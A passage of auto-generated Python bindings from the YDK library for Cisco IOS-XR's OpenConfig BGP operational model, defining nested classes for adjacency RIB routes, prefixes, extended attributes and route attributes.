**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList, self).__init__()
self.yang_name = "ext-attributes-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes))])
self._leafs = OrderedDict([
('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
])
self.originator_id = None
self.aigp = None
self.path_id = None
self.cluster = []
self.ext_community = YList(self)
self.unknown_attributes = YList(self)
self._segment_path = lambda: "ext-attributes-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
class ExtCommunity(_Entity_):
"""
ExtendedCommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
self.yang_name = "ext-community"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "ext-community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
"""
UnknownAttributes
.. attribute:: attribute_type
AttributeType
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_length
AttributeLength
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_value
Atributevalue
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
self.yang_name = "unknown-attributes"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
])
self.attribute_type = None
self.attribute_length = None
self.attribute_value = None
self._segment_path = lambda: "unknown-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
"""
LastModifiedDate
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate, self).__init__()
self.yang_name = "last-modified-date"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-modified-date"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
"""
LastUpdateRecieved
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved, self).__init__()
self.yang_name = "last-update-recieved"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-update-recieved"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes']['meta_info']
class NumRoutes(_Entity_):
"""
Number of routes in adjacency rib out\-bound
post\-policy table
.. attribute:: num_routes
NumRoutes
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes, self).__init__()
self.yang_name = "num-routes"
self.yang_parent_name = "adj-rib-out-pre"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
])
self.num_routes = None
self._segment_path = lambda: "num-routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes, ['num_routes'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre']['meta_info']
class AdjRibInPre(_Entity_):
"""
Adjacency rib in\-bound pre\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre, self).__init__()
self.yang_name = "adj-rib-in-pre"
self.yang_parent_name = "open-config-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes))])
self._leafs = OrderedDict()
self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes()
self.routes.parent = self
self._children_name_map["routes"] = "routes"
self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes()
self.num_routes.parent = self
self._children_name_map["num_routes"] = "num-routes"
self._segment_path = lambda: "adj-rib-in-pre"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes, self).__init__()
self.yang_name = "routes"
self.yang_parent_name = "adj-rib-in-pre"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route))])
self._leafs = OrderedDict()
self.route = YList(self)
self._segment_path = lambda: "routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route, self).__init__()
self.yang_name = "route"
self.yang_parent_name = "routes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved))])
self._leafs = OrderedDict([
('route', (YLeaf(YType.str, 'route'), ['str','str'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
])
self.route = None
self.neighbor_address = None
self.path_id = None
self.valid_route = None
self.invalid_reason = None
self.best_path = None
self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName()
self.prefix_name.parent = self
self._children_name_map["prefix_name"] = "prefix-name"
self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList()
self.route_attr_list.parent = self
self._children_name_map["route_attr_list"] = "route-attr-list"
self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList()
self.ext_attributes_list.parent = self
self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate()
self.last_modified_date.parent = self
self._children_name_map["last_modified_date"] = "last-modified-date"
self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved()
self.last_update_recieved.parent = self
self._children_name_map["last_update_recieved"] = "last-update-recieved"
self._segment_path = lambda: "route"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix
.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName, self).__init__()
self.yang_name = "prefix-name"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix))])
self._leafs = OrderedDict([
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
])
self.prefix_length = None
self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._segment_path = lambda: "prefix-name"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
"""
Prefix
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "prefix-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
"""
RouteAttributesList
.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList, self).__init__()
self.yang_name = "route-attr-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community))])
self._leafs = OrderedDict([
('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
('med', (YLeaf(YType.uint32, 'med'), ['int'])),
('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
])
self.origin_type = None
self.as_path = None
self.as4_path = None
self.med = None
